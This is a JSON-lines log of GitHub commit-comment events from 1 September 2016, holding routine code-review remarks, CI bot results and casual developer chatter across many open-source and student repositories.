{"id":"4499793540","type":"CommitCommentEvent","actor":{"login":"budgierless"},"repo":{"name":"duanqiaobb/distroshare-ubuntu-imager"},"payload":{"comment":{"id":18856241,"position":null,"line":null,"path":null,"commit_id":"98002e9bd5e5619cd678153a9e2840175baffec7","created_at":"2016-09-01T00:36:17Z","updated_at":"2016-09-01T00:36:17Z","body":"Dose +4gb work with your script? because i had issues with large filesystem.squashfs files being corrupt when they are too big. \r\nHave you tested it?"}},"created_at":"2016-09-01T00:36:17Z"}
{"id":"4499793718","type":"CommitCommentEvent","actor":{"login":"tbosch"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18856243,"position":null,"line":null,"path":null,"commit_id":"6ea5b05e7c47353b3dab0bf16742ff8ad4b80728","created_at":"2016-09-01T00:36:18Z","updated_at":"2016-09-01T00:36:18Z","body":"Thanks!\n\nOn Wed, Aug 31, 2016 at 4:35 PM Suguru Inatomi <notifications@github.com>\nwrote:\n\n> @tbosch <https://github.com/tbosch> CI failed on pushing to\n> https://github.com/angular/benchpress-builds\n> https://travis-ci.org/angular/angular/jobs/156650941\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/angular/angular/commit/6ea5b05e7c47353b3dab0bf16742ff8ad4b80728#commitcomment-18855696>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAqKfyUpwndx5Fig5mpy5-CXMtziv8XWks5qlg_PgaJpZM4JyK__>\n> .\n>\n"}},"created_at":"2016-09-01T00:36:18Z"}
{"id":"4499794693","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18856249,"position":null,"line":null,"path":null,"commit_id":"a4454aa02c189959cebc49a32cd256c5672f9879","created_at":"2016-09-01T00:36:41Z","updated_at":"2016-09-01T00:36:41Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2301 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a4454aa02c189959cebc49a32cd256c5672f9879-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a4454aa02c189959cebc49a32cd256c5672f9879-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.31%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T00:36:41Z"}
{"id":"4499796671","type":"CommitCommentEvent","actor":{"login":"monicabazurdo"},"repo":{"name":"zetasergio/RutasEcoturisticasColombia"},"payload":{"comment":{"id":18856254,"position":null,"line":null,"path":null,"commit_id":"82092ba96f7f28784585c757a9c5d7c4e2a3f683","created_at":"2016-09-01T00:37:23Z","updated_at":"2016-09-01T00:37:23Z","body":"![diapositiva1](https://cloud.githubusercontent.com/assets/15915853/18151125/41f7e8b0-6fb2-11e6-8133-45d48f3b9f5d.JPG)\r\n"}},"created_at":"2016-09-01T00:37:23Z"}
{"id":"4499796866","type":"CommitCommentEvent","actor":{"login":"adamdbradley"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":18856256,"position":null,"line":null,"path":null,"commit_id":"a985e6b7a502fe819fe6d7c1086ae62c13cd4124","created_at":"2016-09-01T00:37:27Z","updated_at":"2016-09-01T00:37:27Z","body":"What if the max was set 30 years into the future? I'm not sure you'd want that to be the pre-selected year. "}},"created_at":"2016-09-01T00:37:27Z"}
{"id":"4499801691","type":"CommitCommentEvent","actor":{"login":"laymarty"},"repo":{"name":"LeydyPachon/Electiva-II"},"payload":{"comment":{"id":18856274,"position":null,"line":null,"path":null,"commit_id":"adac2042c48a86a11f6b2c3dda127b3d709e4b44","created_at":"2016-09-01T00:39:11Z","updated_at":"2016-09-01T00:39:11Z","body":"[MockUps.pdf](https://github.com/LeydyPachon/Electiva-II/files/448556/MockUps.pdf)\r\n[PropuestaFoodMap.docx.docx](https://github.com/LeydyPachon/Electiva-II/files/448557/PropuestaFoodMap.docx.docx)\r\n[PropuestaFoodMap.docx.pdf](https://github.com/LeydyPachon/Electiva-II/files/448558/PropuestaFoodMap.docx.pdf)\r\n[FoodMap Descripción y plan de trabajo.docx](https://github.com/LeydyPachon/Electiva-II/files/448559/FoodMap.Descripcion.y.plan.de.trabajo.docx)\r\n"}},"created_at":"2016-09-01T00:39:11Z"}
{"id":"4499802170","type":"CommitCommentEvent","actor":{"login":"laymarty"},"repo":{"name":"LeydyPachon/Electiva-II"},"payload":{"comment":{"id":18856277,"position":null,"line":null,"path":null,"commit_id":"adac2042c48a86a11f6b2c3dda127b3d709e4b44","created_at":"2016-09-01T00:39:21Z","updated_at":"2016-09-01T00:39:21Z","body":"Inicial"}},"created_at":"2016-09-01T00:39:21Z"}
{"id":"4499806112","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856290,"position":null,"line":null,"path":null,"commit_id":"3123e357994195b385e46eba377b47220a92ba51","created_at":"2016-09-01T00:40:41Z","updated_at":"2016-09-01T00:40:41Z","body":"Shit yeah I didn't notice half of these things, I'll fix it ASAP."}},"created_at":"2016-09-01T00:40:41Z"}
{"id":"4499807953","type":"CommitCommentEvent","actor":{"login":"draknyte1"},"repo":{"name":"Blood-Asp/GT5-Unofficial"},"payload":{"comment":{"id":18856296,"position":null,"line":null,"path":null,"commit_id":"b4049e88a269b5def8d3335aec566dcfc387a26b","created_at":"2016-09-01T00:41:10Z","updated_at":"2016-09-01T00:41:10Z","body":"How noticeable is the difference in loading? :+1: "}},"created_at":"2016-09-01T00:41:10Z"}
{"id":"4499809106","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856299,"position":null,"line":null,"path":null,"commit_id":"3123e357994195b385e46eba377b47220a92ba51","created_at":"2016-09-01T00:41:33Z","updated_at":"2016-09-01T00:41:33Z","body":"I didn't check this before pushing. Completely my fault."}},"created_at":"2016-09-01T00:41:33Z"}
{"id":"4499811284","type":"CommitCommentEvent","actor":{"login":"Yuffster"},"repo":{"name":"OpenTrons/opentrons_sdk"},"payload":{"comment":{"id":18856303,"position":null,"line":null,"path":null,"commit_id":"8ab7cede5e9c35df9ee2c51da159cece3c175754","created_at":"2016-09-01T00:42:17Z","updated_at":"2016-09-01T00:42:17Z","body":":heart: \r\n\r\nTrust me, you do not want to work on this without tests. :grinning: "}},"created_at":"2016-09-01T00:42:17Z"}
{"id":"4499811380","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856304,"position":85,"line":74,"path":"chat-plugins/tcgtabletop.js","commit_id":"3123e357994195b385e46eba377b47220a92ba51","created_at":"2016-09-01T00:42:20Z","updated_at":"2016-09-01T00:42:20Z","body":"With the previews it'd be very spammy, and I was personally never a fan of having it in every room anyways but was peer pressured into allowing it."}},"created_at":"2016-09-01T00:42:20Z"}
{"id":"4499813407","type":"CommitCommentEvent","actor":{"login":"Muramasa-"},"repo":{"name":"Blood-Asp/GT5-Unofficial"},"payload":{"comment":{"id":18856314,"position":null,"line":null,"path":null,"commit_id":"b4049e88a269b5def8d3335aec566dcfc387a26b","created_at":"2016-09-01T00:43:06Z","updated_at":"2016-09-01T00:43:06Z","body":"If I remember, about 10 seconds with a decent computer and a small mod list (60~)."}},"created_at":"2016-09-01T00:43:06Z"}
{"id":"4499819042","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856324,"position":112,"line":86,"path":"chat-plugins/tcgtabletop.js","commit_id":"3123e357994195b385e46eba377b47220a92ba51","created_at":"2016-09-01T00:45:08Z","updated_at":"2016-09-01T00:45:08Z","body":"How would it crash?"}},"created_at":"2016-09-01T00:45:08Z"}
{"id":"4499823427","type":"CommitCommentEvent","actor":{"login":"shanjay25"},"repo":{"name":"facebook/Surround360"},"payload":{"comment":{"id":18856335,"position":5,"line":176,"path":"surround360_render/CALIBRATION.md","commit_id":"f563dafa4ab28c936a3f623c6b40ba1079ecf094","created_at":"2016-09-01T00:46:41Z","updated_at":"2016-09-01T00:46:41Z","body":"176"}},"created_at":"2016-09-01T00:46:41Z"}
{"id":"4499824105","type":"CommitCommentEvent","actor":{"login":"virakkong"},"repo":{"name":"virakkong/MEANS"},"payload":{"comment":{"id":18856336,"position":null,"line":null,"path":null,"commit_id":"1da50347d52c6f03cc908dc7ee9f2fc2558e2e33","created_at":"2016-09-01T00:46:56Z","updated_at":"2016-09-01T00:46:56Z","body":"We also add hotel-data.json"}},"created_at":"2016-09-01T00:46:56Z"}
{"id":"4499824969","type":"CommitCommentEvent","actor":{"login":"jamessan"},"repo":{"name":"fwalch/neovim"},"payload":{"comment":{"id":18856338,"position":34,"line":2976,"path":"src/nvim/shada.c","commit_id":"54201f893fe01df7a27e6f959f92e59c19a53f0e","created_at":"2016-09-01T00:47:15Z","updated_at":"2016-09-01T00:47:15Z","body":"> If you run nvim normally the next time, ~/.local/share/nvim/shada/ is non-writable and will cause the same crash as before.\r\n\r\nIt doesn't cause a crash.  It just causes nvim to emit an error, which is already better than Vim's behavior, and then continue letting you run.\r\n\r\nChanging the permissions of the directory isn't useful.  In fact, it's even worse because not only does it hide the problem, but now anyone can modify the contents of that directory."}},"created_at":"2016-09-01T00:47:15Z"}
{"id":"4499827132","type":"CommitCommentEvent","actor":{"login":"shanjay25"},"repo":{"name":"facebook/Surround360"},"payload":{"comment":{"id":18856341,"position":null,"line":null,"path":null,"commit_id":"f563dafa4ab28c936a3f623c6b40ba1079ecf094","created_at":"2016-09-01T00:48:02Z","updated_at":"2016-09-01T00:48:02Z","body":"No"}},"created_at":"2016-09-01T00:48:02Z"}
{"id":"4499830275","type":"CommitCommentEvent","actor":{"login":"sykats"},"repo":{"name":"scalvo1/ElisabethSPlennerth-Fotografa"},"payload":{"comment":{"id":18856344,"position":null,"line":null,"path":null,"commit_id":"67546ed9cbeb80281428ee81184c72341fa8494f","created_at":"2016-09-01T00:49:05Z","updated_at":"2016-09-01T00:49:05Z","body":"Ya sé que está pesadito, pero después sacamos todas las imágenes que no necesitemos. Tengo que solucionar un tema con el hover de los a... hoy no me da par más... jejejeje"}},"created_at":"2016-09-01T00:49:05Z"}
{"id":"4499836751","type":"CommitCommentEvent","actor":{"login":"dbarbalato"},"repo":{"name":"captivationsoftware/react-sticky"},"payload":{"comment":{"id":18856357,"position":null,"line":null,"path":null,"commit_id":"ff37020d0c1f79e918e164a126ca2e6a05b800bc","created_at":"2016-09-01T00:51:17Z","updated_at":"2016-09-01T00:51:17Z","body":"Just as an FYI, this will require usage documentation in the README and some test cases before I will consider it for merging.\r\n\r\nThanks"}},"created_at":"2016-09-01T00:51:17Z"}
{"id":"4499838383","type":"CommitCommentEvent","actor":{"login":"dkbyjh"},"repo":{"name":"quilljs/quill"},"payload":{"comment":{"id":18856360,"position":11,"line":35,"path":"blots/scroll.js","commit_id":"fdd920250c05403ed9e5d6d86826a00167ba0b09","created_at":"2016-09-01T00:51:50Z","updated_at":"2016-09-01T00:51:50Z","body":"sd"}},"created_at":"2016-09-01T00:51:50Z"}
{"id":"4499838784","type":"CommitCommentEvent","actor":{"login":"zxtzelnpl"},"repo":{"name":"zxtzelnpl/plugin"},"payload":{"comment":{"id":18856362,"position":null,"line":null,"path":null,"commit_id":"509ecc16188bd29a631f59cbe4755b5ab93f0147","created_at":"2016-09-01T00:51:57Z","updated_at":"2016-09-01T00:51:57Z","body":"yeah"}},"created_at":"2016-09-01T00:51:57Z"}
{"id":"4499838997","type":"CommitCommentEvent","actor":{"login":"dkbyjh"},"repo":{"name":"quilljs/quill"},"payload":{"comment":{"id":18856363,"position":null,"line":null,"path":null,"commit_id":"fdd920250c05403ed9e5d6d86826a00167ba0b09","created_at":"2016-09-01T00:52:02Z","updated_at":"2016-09-01T00:52:02Z","body":"12"}},"created_at":"2016-09-01T00:52:02Z"}
{"id":"4499839213","type":"CommitCommentEvent","actor":{"login":"abtinr"},"repo":{"name":"dkrprasetya/simple-firebase-unity"},"payload":{"comment":{"id":18856364,"position":null,"line":null,"path":null,"commit_id":"e0ea5d1ae30e7186112f9869870a0e517b2a6efb","created_at":"2016-09-01T00:52:08Z","updated_at":"2016-09-01T00:52:08Z","body":"Hey,\r\n\r\nI am trying to use this package in my unity project to log some events. Particularly, I would like to have something similar to what mentioned here: https://firebase.google.com/docs/analytics/android/events\r\n\r\nmFirebaseAnalytics = FirebaseAnalytics.getInstance(this);\r\nBundle bundle = new Bundle();\r\nbundle.putString(FirebaseAnalytics.Param.ITEM_ID, id);\r\nbundle.putString(FirebaseAnalytics.Param.ITEM_NAME, name);\r\nbundle.putString(FirebaseAnalytics.Param.CONTENT_TYPE, \"image\");\r\nmFirebaseAnalytics.logEvent(FirebaseAnalytics.Event.SELECT_CONTENT, bundle);\r\n\r\nHow can I do it using this package? Thanks."}},"created_at":"2016-09-01T00:52:08Z"}
{"id":"4499839608","type":"CommitCommentEvent","actor":{"login":"dkbyjh"},"repo":{"name":"quilljs/quill"},"payload":{"comment":{"id":18856367,"position":2,"line":53,"path":"test/unit/blots/block.js","commit_id":"fdd920250c05403ed9e5d6d86826a00167ba0b09","created_at":"2016-09-01T00:52:15Z","updated_at":"2016-09-01T00:52:15Z","body":"sadf"}},"created_at":"2016-09-01T00:52:15Z"}
{"id":"4499839960","type":"CommitCommentEvent","actor":{"login":"dkbyjh"},"repo":{"name":"quilljs/quill"},"payload":{"comment":{"id":18856368,"position":2,"line":53,"path":"test/unit/blots/block.js","commit_id":"fdd920250c05403ed9e5d6d86826a00167ba0b09","created_at":"2016-09-01T00:52:21Z","updated_at":"2016-09-01T00:52:21Z","body":"asdfasd"}},"created_at":"2016-09-01T00:52:21Z"}
{"id":"4499840263","type":"CommitCommentEvent","actor":{"login":"kbansal"},"repo":{"name":"CVC4/CVC4"},"payload":{"comment":{"id":18856369,"position":9,"line":38,"path":"src/options/didyoumean.cpp","commit_id":"3db673c6cc8140c17ae229da86102955dce72434","created_at":"2016-09-01T00:52:27Z","updated_at":"2016-09-01T00:52:27Z","body":"Thanks for beautifying the code. I am OK with the changes, except for the change of spacing from \"for(\" to \"for (\" (likewise for if etc). See:\r\n\r\n  http://cvc4.cs.nyu.edu/wiki/Developer's_Guide#Whitespace.2Ftabs\r\n\r\nIn particular, it says \"No whitespace between if, for, while, 'catch', etc., and their opening parenthesis.\"\r\n\r\nI doubt all of CVC4 follows all the different aspects of the CVC4 style guide, but I'd not undo aspects that have been followed.\r\n"}},"created_at":"2016-09-01T00:52:27Z"}
{"id":"4499840740","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856371,"position":6,"line":17,"path":"en/source/packet_lib.rst","commit_id":"9de74a9ac2f144ec9cf2e12367ce984833b30a54","created_at":"2016-09-01T00:52:35Z","updated_at":"2016-09-01T00:52:35Z","body":"以下の文章に修正します。\r\n```\r\nThe following protocol is used mainly in OpenFlow.\r\n```"}},"created_at":"2016-09-01T00:52:35Z"}
{"id":"4499841799","type":"CommitCommentEvent","actor":{"login":"easyaspi314"},"repo":{"name":"DecimalMan/dkp"},"payload":{"comment":{"id":18856377,"position":null,"line":null,"path":null,"commit_id":"4febd05f36e0602a9e1434959eed0d240a6c7b23","created_at":"2016-09-01T00:52:55Z","updated_at":"2016-09-01T00:52:55Z","body":"Haha looks like everyone has/had a Skyrocket. \r\n\r\nCan't brick it, can't break it.\r\n\r\nBoth me and the previous owner beat the **** out of it. Glass cracked, screen yellowed, battery worn out, case chewed up (not me unable to find the screw under the sticker ), and dust in the camera sensor. And my friend broke my SIM slot. Still runs. \r\n\r\nThanks for the build, but I already have CM13 on it. :P"}},"created_at":"2016-09-01T00:52:55Z"}
{"id":"4499841815","type":"CommitCommentEvent","actor":{"login":"thomas-p-wilson"},"repo":{"name":"captivationsoftware/react-sticky"},"payload":{"comment":{"id":18856378,"position":null,"line":null,"path":null,"commit_id":"ff37020d0c1f79e918e164a126ca2e6a05b800bc","created_at":"2016-09-01T00:52:56Z","updated_at":"2016-09-01T00:52:56Z","body":"My final solution was much more involved that what is here. In fact, I ended up not using react-sticky. I'll see if I can't get my solution working in react-sticky. Docs and tests naturally of course."}},"created_at":"2016-09-01T00:52:56Z"}
{"id":"4499843747","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856381,"position":null,"line":null,"path":null,"commit_id":"542c1e2a7a22ee9406f59bd6e080c9b867faea5d","created_at":"2016-09-01T00:53:34Z","updated_at":"2016-09-01T00:53:34Z","body":"Is this better now @Slayer95? Sorry for the shit commit once again."}},"created_at":"2016-09-01T00:53:34Z"}
{"id":"4499848328","type":"CommitCommentEvent","actor":{"login":"sigsegv-mvm"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":18856391,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-01T00:55:11Z","updated_at":"2016-09-01T00:55:11Z","body":"@jung35 Yeah, would definitely appreciate if there was a way to at least login and download our lists that we'd made, for a few days."}},"created_at":"2016-09-01T00:55:11Z"}
{"id":"4499849648","type":"CommitCommentEvent","actor":{"login":"thornley-touchstar"},"repo":{"name":"pepe2k/u-boot_mod"},"payload":{"comment":{"id":18856392,"position":null,"line":null,"path":null,"commit_id":"3527b8cc2a989e51197831eab1f941429f8ffeea","created_at":"2016-09-01T00:55:38Z","updated_at":"2016-09-01T00:55:38Z","body":"Thanks for information Piotr.\r\n\r\nqca_dram_cas_lat() should still be fine as long as it doesn't become +2/+3.\r\n\r\nI'll submit a pull request to make the change to (CLx2)+1 as a potential hack/workaround, but restrict it to AR933x and DDR2. Keep it as a placeholder if you want, for now i'll cherry-pick it into my branch for this hardware.\r\n\r\nIf you decide to add it, it obviously would need to be tested across a range of hardware variants. I have tested it only on a couple of our devices at this stage (one faulty prior to this change, and the other which worked fine prior to this change) - both are running fine after the patch.\r\n\r\nOur hardware requirements are to run in a wide temperature range, my testing indicated the CPU runs around ~62degC when under load (thermocouple on package) but the RAM I haven't tested yet (nor in the final enclosure which is fully sealed). I noted the SELF EMR2 setting is also present on the Zentel RAM this SKW72 module uses.\r\n\r\nFor testing, I run a CPU/IO/MEM stress test on the device, and then iperf3 to push the wireless side."}},"created_at":"2016-09-01T00:55:38Z"}
{"id":"4499850466","type":"CommitCommentEvent","actor":{"login":"Xinghaoz"},"repo":{"name":"Xinghaoz/thinkhow"},"payload":{"comment":{"id":18856394,"position":null,"line":null,"path":null,"commit_id":"fba5eefd5e012e01ff0eb881010ae4d5ae1cb89e","created_at":"2016-09-01T00:55:57Z","updated_at":"2016-09-01T00:55:57Z","body":"A lot of changes!! Yeah~~"}},"created_at":"2016-09-01T00:55:57Z"}
{"id":"4499854875","type":"CommitCommentEvent","actor":{"login":"jbarlow83"},"repo":{"name":"jbarlow83/OCRmyPDF"},"payload":{"comment":{"id":18856406,"position":null,"line":null,"path":null,"commit_id":"325cc0beca8f268744779f5aa5e17061626e440f","created_at":"2016-09-01T00:57:34Z","updated_at":"2016-09-01T00:57:34Z","body":"That should work fine. This is really a fix to the test suite in that test_pageinfo.py and test_hocrtransform.py use `import ocrmypdf.module` and test_main.py did not necessarily locate the same installation if `ocrmypdf` is installed. By calling Python via `sys.executable -m package` the same import resolution order as `import` should be followed so all parts of the test suite are testing whatever Python finds in response to `import ocrmypdf` - meaning it follows `sys.path`, the first entry of which is the current working directory.\r\n\r\nSo as written, it will run tests on a new version prior to installation or on the installed version for CI.\r\n\r\nThat said, there could be reasons you might want to explicitly test `/usr/[local/]bin/ocrmypdf`. I can't think of anything that should be needed other than a basic sanity check:\r\n\r\n```bash\r\ntest \"$(ocrmypdf --version)\" == \"$(python3 -m ocrmypdf --version)\"\r\n```\r\n\r\nIs there anything beyond that you'd need to check?"}},"created_at":"2016-09-01T00:57:34Z"}
{"id":"4499855597","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18856409,"position":null,"line":null,"path":null,"commit_id":"9de74a9ac2f144ec9cf2e12367ce984833b30a54","created_at":"2016-09-01T00:57:48Z","updated_at":"2016-09-01T00:57:48Z","body":"あれ？削除だったんでしたっけ？\r\n`we` を `Ryu-Book readers` とかに変えれば良いとかでは？"}},"created_at":"2016-09-01T00:57:48Z"}
{"id":"4499885202","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856463,"position":112,"line":86,"path":"chat-plugins/tcgtabletop.js","commit_id":"3123e357994195b385e46eba377b47220a92ba51","created_at":"2016-09-01T01:08:01Z","updated_at":"2016-09-01T01:08:01Z","body":"{thumbnail: {toString: 'JS rules'}}"}},"created_at":"2016-09-01T01:08:01Z"}
{"id":"4499886863","type":"CommitCommentEvent","actor":{"login":"zhujunjie115197"},"repo":{"name":"zhujunjie115197/hello-world"},"payload":{"comment":{"id":18856464,"position":null,"line":null,"path":null,"commit_id":"335e12f741f026d684a3b2d3286e2f207b141e1e","created_at":"2016-09-01T01:08:28Z","updated_at":"2016-09-01T01:08:28Z","body":"111"}},"created_at":"2016-09-01T01:08:28Z"}
{"id":"4499889138","type":"CommitCommentEvent","actor":{"login":"xushiwei"},"repo":{"name":"nareix/joy4"},"payload":{"comment":{"id":18856467,"position":57,"line":57,"path":"cmd/joy4/README.md","commit_id":"8231f75c6797822e8025e4aa64662e76161f3da4","created_at":"2016-09-01T01:09:19Z","updated_at":"2016-09-01T01:09:19Z","body":"叫 GET /v1/streams 就可以"}},"created_at":"2016-09-01T01:09:19Z"}
{"id":"4499889614","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856468,"position":85,"line":74,"path":"chat-plugins/tcgtabletop.js","commit_id":"3123e357994195b385e46eba377b47220a92ba51","created_at":"2016-09-01T01:09:28Z","updated_at":"2016-09-01T01:09:28Z","body":"That's a permission issue"}},"created_at":"2016-09-01T01:09:28Z"}
{"id":"4499892224","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856475,"position":17,"line":21,"path":"chat-plugins/tcgtabletop.js","commit_id":"542c1e2a7a22ee9406f59bd6e080c9b867faea5d","created_at":"2016-09-01T01:10:21Z","updated_at":"2016-09-01T01:10:21Z","body":"Responses don't emit errors. Requests do."}},"created_at":"2016-09-01T01:10:21Z"}
{"id":"4499892984","type":"CommitCommentEvent","actor":{"login":"GregoryLundberg"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18856477,"position":11,"line":909,"path":"data/lua/wml-tags.lua","commit_id":"3f7db7f8789e6d3b2091890edc755bea49b08009","created_at":"2016-09-01T01:10:38Z","updated_at":"2016-09-01T01:10:38Z","body":"I was thinking of 'end' here and letting the error go even if we're going to auto_recall. Or not even checking for auto_recall. As zookeeper said, all I'd need do is specify role=\"\" to suppress the error for my Felony Abuse of a Feature."}},"created_at":"2016-09-01T01:10:38Z"}
{"id":"4499893351","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18856478,"position":42,"line":46,"path":"chat-plugins/tcgtabletop.js","commit_id":"542c1e2a7a22ee9406f59bd6e080c9b867faea5d","created_at":"2016-09-01T01:10:46Z","updated_at":"2016-09-01T01:10:46Z","body":"Ditto"}},"created_at":"2016-09-01T01:10:46Z"}
{"id":"4499893466","type":"CommitCommentEvent","actor":{"login":"AlexandreSNeto"},"repo":{"name":"AlexandreSNeto/parking-app"},"payload":{"comment":{"id":18856479,"position":null,"line":null,"path":null,"commit_id":"01de79a4ed4e7fc379d42338018b8952ee90c967","created_at":"2016-09-01T01:10:49Z","updated_at":"2016-09-01T01:10:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;ncuqQopM&#x2F;26-incluir-mascara-de-loading-nos-blocos-carregados-dinamicamente\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Incluir máscara de Loading nos blocos carregados dinamicamente</a>"}},"created_at":"2016-09-01T01:10:49Z"}
{"id":"4499893927","type":"CommitCommentEvent","actor":{"login":"AlexandreSNeto"},"repo":{"name":"AlexandreSNeto/parking-app"},"payload":{"comment":{"id":18856482,"position":null,"line":null,"path":null,"commit_id":"29c4e7a33bbd6fde821ac27000a054adac43c1ff","created_at":"2016-09-01T01:10:58Z","updated_at":"2016-09-01T01:10:58Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;NfCyTAAH&#x2F;34-alterar-logo-da-aplicacao-garagem-cwi\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Alterar logo da aplicação: Garagem CWI</a>"}},"created_at":"2016-09-01T01:10:58Z"}
{"id":"4499894410","type":"CommitCommentEvent","actor":{"login":"AlexandreSNeto"},"repo":{"name":"AlexandreSNeto/parking-app"},"payload":{"comment":{"id":18856483,"position":null,"line":null,"path":null,"commit_id":"639c439f153b5d6d3e6de99de6222b8deac7970a","created_at":"2016-09-01T01:11:09Z","updated_at":"2016-09-01T01:11:09Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;oiWweR7o&#x2F;32-usar-input-type-tel-para-que-o-teclado-numerico-seja-exibido\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Usar input type&#x3D;&quot;tel&quot; para que o teclado numérico seja exibido.</a>"}},"created_at":"2016-09-01T01:11:09Z"}
{"id":"4499896598","type":"CommitCommentEvent","actor":{"login":"lurch"},"repo":{"name":"RPi-Distro/python-gpiozero"},"payload":{"comment":{"id":18856491,"position":null,"line":null,"path":null,"commit_id":"89062ed4c2a68b84e169d2f2b1b446f421cba68d","created_at":"2016-09-01T01:11:56Z","updated_at":"2016-09-01T01:11:56Z","body":"> @lurch any dying requests for the point release?\r\n\r\nNothing particularly urgent from my POV."}},"created_at":"2016-09-01T01:11:56Z"}
{"id":"4499897143","type":"CommitCommentEvent","actor":{"login":"xushiwei"},"repo":{"name":"nareix/joy4"},"payload":{"comment":{"id":18856493,"position":58,"line":58,"path":"cmd/joy4/README.md","commit_id":"8231f75c6797822e8025e4aa64662e76161f3da4","created_at":"2016-09-01T01:12:08Z","updated_at":"2016-09-01T01:12:08Z","body":"这里一般很少设计为 object，通常 array 更常见"}},"created_at":"2016-09-01T01:12:08Z"}
{"id":"4499897450","type":"CommitCommentEvent","actor":{"login":"draknyte1"},"repo":{"name":"Blood-Asp/GT5-Unofficial"},"payload":{"comment":{"id":18856496,"position":null,"line":null,"path":null,"commit_id":"b4049e88a269b5def8d3335aec566dcfc387a26b","created_at":"2016-09-01T01:12:13Z","updated_at":"2016-09-01T01:12:13Z","body":"My modpack weighs in at 201 mods, lol.\r\nI'll build without, profile, build with this commit, profile, let y'all know."}},"created_at":"2016-09-01T01:12:13Z"}
{"id":"4499898297","type":"CommitCommentEvent","actor":{"login":"christopheradams"},"repo":{"name":"fontlibrary/fontaine"},"payload":{"comment":{"id":18856498,"position":null,"line":null,"path":null,"commit_id":"8c7421aa78b182a738092737d1c9c6a86a86a3a8","created_at":"2016-09-01T01:12:30Z","updated_at":"2016-09-01T01:12:30Z","body":"I agree, escaping unicode is unnecessary. \r\n\r\nYes, I can push to master, but I'm more comfortable making branches/PR's since I'm not very familiar with the codebase (or C++)."}},"created_at":"2016-09-01T01:12:30Z"}
{"id":"4499899587","type":"CommitCommentEvent","actor":{"login":"christopheradams"},"repo":{"name":"fontlibrary/fontaine"},"payload":{"comment":{"id":18856504,"position":null,"line":null,"path":null,"commit_id":"8c7421aa78b182a738092737d1c9c6a86a86a3a8","created_at":"2016-09-01T01:12:57Z","updated_at":"2016-09-01T01:12:57Z","body":"PR is https://github.com/fontlibrary/fontaine/pull/4/files, so I can remove this branch."}},"created_at":"2016-09-01T01:12:57Z"}
{"id":"4499900540","type":"CommitCommentEvent","actor":{"login":"jeffersonSantos13"},"repo":{"name":"augustoaraujo97/PI02"},"payload":{"comment":{"id":18856506,"position":1,"line":4,"path":"Passos_do_git.txt","commit_id":"91b70d7dd1a78a5e5655c897159a1172c5ccda82","created_at":"2016-09-01T01:13:17Z","updated_at":"2016-09-01T01:13:17Z","body":"CD ? ou DVD ? ou VHS ? "}},"created_at":"2016-09-01T01:13:17Z"}
{"id":"4499902923","type":"CommitCommentEvent","actor":{"login":"kwen8"},"repo":{"name":"Lan-W/Myproject"},"payload":{"comment":{"id":18856514,"position":null,"line":null,"path":null,"commit_id":"f4d400dc03e3177ea5d8d16ef2a3dd0ab7f326fe","created_at":"2016-09-01T01:14:11Z","updated_at":"2016-09-01T01:14:11Z","body":"💃 👍 👍 👍 "}},"created_at":"2016-09-01T01:14:11Z"}
